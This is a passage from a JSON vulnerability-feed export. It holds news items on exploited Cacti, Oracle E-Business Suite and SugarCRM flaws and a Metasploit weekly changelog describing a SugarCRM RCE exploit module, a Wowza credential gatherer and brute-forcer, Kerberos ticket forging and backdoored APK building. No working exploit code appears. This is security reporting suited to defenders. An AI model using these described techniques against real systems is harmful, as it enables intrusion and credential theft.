\n\nIt's not uncommon for malicious actors to capitalize on newly disclosed vulnerabilities to carry out their attacks, making it imperative that users move quickly plug the security holes.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-14T08:11:00", "type": "thn", "title": "Cacti Servers Under Attack as Majority Fail to Patch Critical Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-46169", "CVE-2023-22952"], "modified": "2023-01-14T08:11:22", "id": "THN:97E5CF17B9C951760E9B4C679F9F6DEE", "href": "https://thehackernews.com/2023/01/cacti-servers-under-attack-as-majority.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-02-03T15:36:04", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEimyue4RAUobLSPaohWuX32BxGD8BNCIv751w1ZahrzYwEdFlgLkf5p7t9WLvQi75_oWEaPEUPZ59NXh292XZYa1smVBKDoEsWqF-qfUYc1VGNWP0Os3Dnc5sqSVZ9exN0n0Zzo16RREkqYLv7cgQTuLj6nkli8bGpN3m53kdFaqHMnlXeuBeo4Y6AP/s728-e365/oracle.png>)\n\nThe U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) on February 2 [added](<https://www.cisa.gov/uscert/ncas/current-activity/2023/02/02/cisa-adds-two-known-exploited-vulnerabilities-catalog>) two security flaws to its Known Exploited Vulnerabilities (KEV) Catalog, citing evidence of active exploitation.\n\nThe first of the two vulnerabilities is [CVE-2022-21587](<https://nvd.nist.gov/vuln/detail/CVE-2022-21587>) (CVSS score: 9.8), a critical issue impacting versions 12.2.3 to 12.2.11 of the Oracle Web Applications Desktop Integrator product.\n\n\"Oracle E-Business Suite contains an unspecified vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator,\" CISA [said](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\nThe issue was addressed by Oracle as part of its [Critical Patch Update](<https://www.oracle.com/security-alerts/cpuoct2022.html>) released in October 2022. Not much is known about the nature of the attacks exploiting the vulnerability, but the development follows the [publication](<https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/>) of a proof-of-concept (PoC) by cybersecurity firm Viettel on January 16, 2023.\n\nThe second security flaw to be added to the KEV catalog is [CVE-2023-22952](<https://nvd.nist.gov/vuln/detail/CVE-2023-22952>) (CVSS score: 8.8), which relates to a case of [missing input validation](<https://thehackernews.com/2023/01/cacti-servers-under-attack-as-majority.html>) in SugarCRM that could result in the injection of arbitrary PHP code. 
The bug has been fixed in SugarCRM versions 11.0.5 and 12.0.2.\n\nThe development comes a week after CISA also added [CVE-2017-11357](<https://nvd.nist.gov/vuln/detail/CVE-2017-11357>) (CVSS score: 9.8), a severe security vulnerability impacting Telerik UI that could facilitate arbitrary file uploads or remote code execution.\n\nIn light of active exploitation attempts, Federal Civilian Executive Branch (FCEB) agencies in the U.S. are required to apply the patches by February 23, 2023.\n\n \n\n\nFound this article interesting? Follow us on [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-03T05:23:00", "type": "thn", "title": "CISA Alert: Oracle E-Business Suite and SugarCRM Vulnerabilities Under Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11357", "CVE-2022-21587", "CVE-2023-22952"], "modified": "2023-02-03T15:02:56", "id": "THN:8DEF040F235E88FCB18313526D0E4C2F", "href": 
"https://thehackernews.com/2023/02/cisa-alert-oracle-e-business-suite-and.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "rapid7blog": [{"lastseen": "2023-03-10T20:15:00", "description": "## Wowza, a new credential gatherer and login scanner!\n\n\n\nThis week Metasploit Framework gained a credential gatherer for Wowza Streaming Engine Manager. Credentials for this application are stored in a file named `admin.password` in a known location and the file is readable by default by `BUILTIN\\Users` on Windows and is world-readable on Linux, so any local account can recover the manager credentials without elevated privileges; restricting that file's permissions is the obvious hardening step. The module was written by community contributor [bcoles](<https://github.com/bcoles>) who also wrote a login scanner for Wowza this week. The login scanner can be used to validate the credentials found by the gatherer. The two modules complement each other quite nicely.\n\n## New module content (3)\n\n### Wowza Streaming Engine Manager Login Utility\n\nAuthor: bcoles \nType: Auxiliary \nPull request: [#17733](<https://github.com/rapid7/metasploit-framework/pull/17733>) contributed by [bcoles](<https://github.com/bcoles>)\n\nDescription: This adds a login scanner module to brute force credentials of Wowza Streaming Engine Manager.\n\n### SugarCRM unauthenticated Remote Code Execution (RCE)\n\nAuthors: Sw33t.0day and h00die-gr3y \nType: Exploit \nPull request: [#17507](<https://github.com/rapid7/metasploit-framework/pull/17507>) contributed by [h00die-gr3y](<https://github.com/h00die-gr3y>) \nAttackerKB reference: [CVE-2023-22952](<https://attackerkb.com/topics/E486ui94II/cve-2023-22952?referrer=blog>)\n\nDescription: A module has been added which exploits CVE-2023-22952, an RCE vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2. 
Successful exploitation as an unauthenticated attacker will result in remote code execution as the user running the web services, which is typically `www-data`.\n\n### Gather Wowza Streaming Engine Credentials\n\nAuthor: bcoles \nType: Post \nPull request: [#17737](<https://github.com/rapid7/metasploit-framework/pull/17737>) contributed by [bcoles](<https://github.com/bcoles>)\n\nDescription: This adds a post module that collects Wowza Streaming Engine user credentials from the `admin.password` local configuration file. This file is world-readable by default on Linux and readable by `BUILTIN\\Users` on Windows.\n\n## Enhancements and features (9)\n\n * [#17675](<https://github.com/rapid7/metasploit-framework/pull/17675>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Updates the `admin/kerberos/forge_ticket` to support a new `extra_sids` option which can be useful for including cross-domain SIDs for forging external Kerberos trust tickets as part of cross-trust domain escalation. The `admin/kerberos/inspect_ticket` has also been updated to support viewing these extra SID values.\n * [#17686](<https://github.com/rapid7/metasploit-framework/pull/17686>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This adds 3 additional methods to the existing PetitPotam module to make it work even if the patch for CVE-2021-36942 has been installed. 
Note that it still will not work against hosts that have the December 2021 patch applied.\n * [#17715](<https://github.com/rapid7/metasploit-framework/pull/17715>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The Metasploit Payload gem has been bumped to 2.0.115, bringing in support for the `arp` command to Python Meterpreter on Linux, and adding support for displaying IPv6 routing tables using the `route` command on Windows.\n * [#17727](<https://github.com/rapid7/metasploit-framework/pull/17727>) from [rohitkumarankam](<https://github.com/rohitkumarankam>) \\- Two new options have been added to the login scanner library: `max_consecutive_error_count` and `max_error_count`. These options allow users to set the maximum number of errors that are allowed to occur when connecting as well as the maximum number of consecutive errors that are allowed when connecting before the login scanner will give up on a target.\n * [#17744](<https://github.com/rapid7/metasploit-framework/pull/17744>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- The code for `msfconsole` has been updated so that performance profiling can also take into account the time it takes to load `msfenv` and console related libraries, thereby allowing for more accurate performance profiling.\n * [#17745](<https://github.com/rapid7/metasploit-framework/pull/17745>) from [gwillcox-r7](<https://github.com/gwillcox-r7>) \\- This updates the metasploit-payloads gem to pull in changes to the Python Meterpreter on Windows to add the `route add` and `route delete` commands as well as the ability to get process information such as process names and paths.\n * [#17746](<https://github.com/rapid7/metasploit-framework/pull/17746>) from [todb-r7](<https://github.com/todb-r7>) \\- The `data/wordlists/password.lst` password list has been updated to include `r50$K28vaIFiYxaY`, the master password that LastPass suggests as an example when a user goes to create a new master password, as well as to fix some encoding 
issues.\n * [#17749](<https://github.com/rapid7/metasploit-framework/pull/17749>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Updates the `auxiliary/admin/kerberos/keytab.rb` module to additionally export any NTHASHES, which can be useful for decrypting Kerberos network traffic in Wireshark.\n * [#17756](<https://github.com/rapid7/metasploit-framework/pull/17756>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Updates secrets dump to generate the Kerberos RC4 key for the machine account.\n\n## Bugs fixed (8)\n\n * [#17673](<https://github.com/rapid7/metasploit-framework/pull/17673>) from [bcoles](<https://github.com/bcoles>) \\- `lib/msf/core/payload/apk.rb` has been updated so that by default it only decompiles the main classes instead of all classes, fixing some issues whereby decompiling all classes would prevent creation of a backdoored APK. This also bumps up the minimum `apktool` version to 2.4.1 and makes it so that versions prior to 2.7.0 of `apktool` will throw a warning about being potentially out of date.\n * [#17716](<https://github.com/rapid7/metasploit-framework/pull/17716>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- A bug has been fixed whereby the reverse port forward information message was displayed incorrectly, and the same information was shown on both the local and remote parts of the message.\n * [#17721](<https://github.com/rapid7/metasploit-framework/pull/17721>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- This fixes an issue where payloads that were adapted failed when stage encoding was enabled because the stage encoding was based on the stager arch and platform values. 
These values were always the same until we introduced adapted payloads, which can vary.\n * [#17723](<https://github.com/rapid7/metasploit-framework/pull/17723>) from [jvoisin](<https://github.com/jvoisin>) \\- A bug has been fixed in the `modules/encoders/php/base64.rb` encoder whereby strings were being passed as literal strings without being properly quoted, which could result in errors on newer versions of PHP.\n * [#17726](<https://github.com/rapid7/metasploit-framework/pull/17726>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The Metasploit Payloads gem has been updated bringing in initial support for attaching to processes on Python Meterpreter shells on Windows, a bug fix for the `route` command on newer versions of Windows on Windows Meterpreter, and a fix so that both C Meterpreter and Python Meterpreter sessions will attempt to enable the same set of permissions when running `getprivs`.\n * [#17729](<https://github.com/rapid7/metasploit-framework/pull/17729>) from [bcoles](<https://github.com/bcoles>) \\- Fixes an edge case crash when running Ruby 3.2\n * [#17738](<https://github.com/rapid7/metasploit-framework/pull/17738>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fix Ruby 3.2 crash when running certain tools\n * [#17758](<https://github.com/rapid7/metasploit-framework/pull/17758>) from [zeroSteiner](<https://github.com/zeroSteiner>) \\- The metasploit-payloads gem has been bumped to fix a token handle leak that was causing Python Meterpreters to leave dangling handles after using `getprivs`, fix a error in `packet_transmit_http` whereby error codes were not appropriately returned, and update the `arp` command to properly return the interface name instead of the index for the `interface` column.\n\n## Documentation added (3)\n\n * [#17684](<https://github.com/rapid7/metasploit-framework/pull/17684>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This PR adds the RBCD exploitation documentation to the docs site.\n * 
[#17688](<https://github.com/rapid7/metasploit-framework/pull/17688>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- This PR fixes several broken wiki links, as well as adding validation so that users don't use the wrong syntax when making docs changes.\n * [#17743](<https://github.com/rapid7/metasploit-framework/pull/17743>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- A new page has been added to explain the `METASPLOIT_CPU_PROFILE` and `METASPLOIT_MEMORY_PROFILE` options and to explain how to profile `msfconsole`'s and `msfvenom`'s performance on systems.\n\nYou can always find more documentation on our docsite at [docs.metasploit.com](<https://docs.metasploit.com/>).\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.3.5...6.3.6](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222023-03-02T14%3A22%3A58%2B00%3A00..2023-03-09T19%3A29%3A16%2B01%3A00%22>)\n * [Full diff 6.3.5...6.3.6](<https://github.com/rapid7/metasploit-framework/compare/6.3.5...6.3.6>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. 
\nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-10T19:00:00", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36942", "CVE-2023-22952"], "modified": "2023-03-10T19:00:00", "id": "RAPID7BLOG:A7E1C05842DF5C07D9B1BA23B2235727", "href": "https://blog.rapid7.com/2023/03/10/metasploit-weekly-wrap-up-196/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}]}